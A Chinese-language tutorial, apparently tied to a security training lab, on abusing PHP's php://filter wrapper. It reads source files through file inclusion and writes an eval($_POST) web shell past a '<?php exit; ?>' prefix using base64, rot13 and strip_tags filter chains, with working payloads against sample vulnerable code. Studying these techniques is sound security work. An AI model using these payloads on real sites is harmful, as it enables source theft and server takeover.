PHP偽協議的妙用
filter協議的簡單利用:
php://filter是一種元封裝器, 設計用於資料流開啟時的篩選過濾應用。 這對於一體式(all-in-one)的檔案函式非常有用,類似 readfile()、 file() 和 file_get_contents(), 在資料流內容讀取之前沒有機會應用其他過濾器。
resource=<要過濾的資料流> 這個引數是必須的。它指定了你要篩選過濾的資料流。
read=<讀鏈的篩選列表> 該引數可選。可以設定一個或多個過濾器名稱,以管道符(|)分隔。
write=<寫鏈的篩選列表> 該引數可選。可以設定一個或多個過濾器名稱,以管道符(|)分隔。
任何沒有以 read= 或 write= 作字首 的篩選器列表會視情況應用於讀或寫鏈。 首先給出最簡單的檔案包含的示例程式碼:
<?php
$file = $_GET["file"];
include($file);
?>在同目錄下有一個flag.php檔案:
<?php
$flag = "flag{Lxxx}";
想要讀取flag.php檔案,可以利用filter偽協議,傳參如下:
?file=php://filter/convert.base64-encode/resource=flag.php這樣即可讀到flag.php檔案base64加密過後的內容
PD9waHANCiRmbGFnID0gImZsYWd7THh4eH0iOw0K然而,對於filter協議,不只有這一種寫法:
?file=php://filter/read=convert.base64-encode/resource=flag.php
#這一種是指定讀鏈的篩選列表除了使用convert.base64-encode過濾器,還可以使用其他的一些過濾器,比如字元編碼型別的,payload如下:
?file=php://filter/read=convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php得到結果:
?<hp
p$
lfga= " lfgaL{xx}x;"
將其解碼,同樣可以得到flag.php原內容
<?php
$str = "lfga= \" lfgaL{xx}x;\"";
echo iconv('UCS-2BE', 'UCS-2LE', $str);
?>
得到結果:
flag = "flag{Lxxx}";其他有關PHP支援的字元編碼官方文件如下:PHP: 支援的字元編碼 - Manual
filter協議的進階利用:
利用filter偽協議繞過死亡之die、死亡之exit
假設我們有以下程式碼:
<?php
$content = $_POST['content'];
file_put_contents($_GET['filename'], "<?php exit; ?>".$content);這幾行程式碼允許我們寫入檔案,但是當我們寫入檔案的時候會在我們寫的字串前新增exit的命令。這樣導致我們即使寫入了一句話木馬,依然是執行不了一句話的。
分析這幾行程式碼,一共需要我們傳兩個引數,一個是POST請求的content,另一個是GET請求的filename,而對於GET請求中的filename變數,我們是可以通過php://filter偽協議來控制的,在前面有提到,最常見的方法是使用base64的方法將content解碼後傳入。
base64編碼繞過:
假設我們先隨便傳入一句話木馬:
?filename=php://filter/convert.base64-decode/resource=1.php
POSTDATA: content=PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+這個時候我們開啟1.php檔案:
可以發現裡面是一堆亂碼,原因是不僅我們的加密後的一句話木馬進行了base64解碼,而且前面的死亡之exit也進行了解碼。
我們仔細分析一下死亡之exit的程式碼:
<?php exit; ?>base64編碼中只包含64個可列印字元,而當PHP在解碼base64時,遇到不在其中的字元時,會選擇跳過這些字元,將有效的字元重新組成字串進行解碼。
例如:
<?php
$str = "THh4eA==";
echo base64_decode($str);
?>得到結果:Lxxx
如果我們在str變數中新增一些不可見的字元或者是不可解碼字元(\x00,?)
<?php
$str = "TH?h4eA==";
echo base64_decode($str);
?>得到的結果仍然為:Lxxx
因此,對於死亡之exit中的程式碼,字元<、?、;、>、空格等字元不符合base64解碼範圍。最終解碼符合要求的只有phpexit這7個字元,而base64在解碼的時候,是4個位元組一組,因此還少一個,所以我們將這一個手動新增上去。
傳payload如下:
?filename=php://filter/convert.base64-decode/resource=1.php
POSTDATA: content=aPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+content中第一個字元a就是我們新增的
這個時候我們檢視1.php的內容如下:
可以看到一句話木馬已經成功寫入了。
rot13編碼繞過:
除了使用base64編碼繞過,我們還可以使用rot13編碼繞過。相比base64編碼,rot13的繞過死亡之exit更加方便,因為不用考慮前面新增的內容是否可以用base64解碼,也不需要計算可base64解碼的字元數量。
同樣的還是上面的示例程式碼:
<?php
$content = $_POST['content'];
file_put_contents($_GET['filename'], "<?php exit; ?>".$content);傳payload:
?filename=php://filter/string.rot13/resource=1.php
POSTDATA: content=<?cuc riny($_CBFG[1]);?>開啟1.php檔案:
可以看到,一句話木馬也成功寫入了。
雖然rot13更加的方便,但是還是有缺點,就是當伺服器開啟了短標籤解析,一句話木馬即使寫入了,也不會被PHP解析。
多種過濾器繞過:
再仔細觀察死亡之exit的程式碼:
<?php exit; ?>可以看到死亡之exit的程式碼其實本質上是XML標籤,因此我們可以使用strip_tags函式除去該XML標籤
並且,filter協議允許我們使用多種過濾器,所以我們還是針對上面的例項程式碼:
<?php
$content = $_POST['content'];
file_put_contents($_GET['filename'], "<?php exit; ?>".$content);傳payload如下:
?filename=php://filter/string.strip_tags|convert.base64-decode/resource=1.php
POSTDATA: content=PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+檢視1.php
這時候可以看到一句話木馬乾乾淨淨地在1.php檔案中,不摻雜任何雜質
參考資料
相關實驗:<PHP安全特性之偽協議>
合天智匯:合天網路靶場、網安實戰虛擬環境